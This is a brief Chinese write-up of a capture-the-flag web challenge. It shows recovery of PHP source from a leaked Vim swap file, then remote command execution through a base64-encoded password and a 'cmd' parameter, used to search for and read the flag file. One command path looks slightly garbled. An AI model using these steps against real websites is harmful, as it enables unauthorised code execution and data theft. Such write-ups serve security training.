[LitCTF 2023]Vim yyds
目录
[LitCTF 2023]Vim yyds
根据题意,直接开扫:
/.index.php.swp
为泄露的文件,访问并下载
用 vim 打开一个文件时,都会产生一个
.swp
的隐藏文件,这个文件是一个临时交换文件,用来备份缓冲区中的内容,用于保存数据。当正常关闭时,此文件会被删除;当文件非正常关闭(比如直接关闭终端或者电脑断电等)时,文件不会被删除,可用此文件来恢复。
将 index.php.swp
丢到 Linux 系统的机子上 (这里以 kali 为例)
恢复 index.php
:vim -r /home/kali/桌面/index.php.swp
|
|
想要利用 RCE 漏洞必须给 password 参数传值 “Give_Me_Your_Flag” 的 base64 编码形式:R2l2ZV9NZV9Zb3VyX0ZsYWc=
查询 flag 位置:password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=find / -name "flag*"
查看 flag :password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /cpu1/domain0/flags /flag
欲将心事付瑶琴。知音少,弦断有谁听?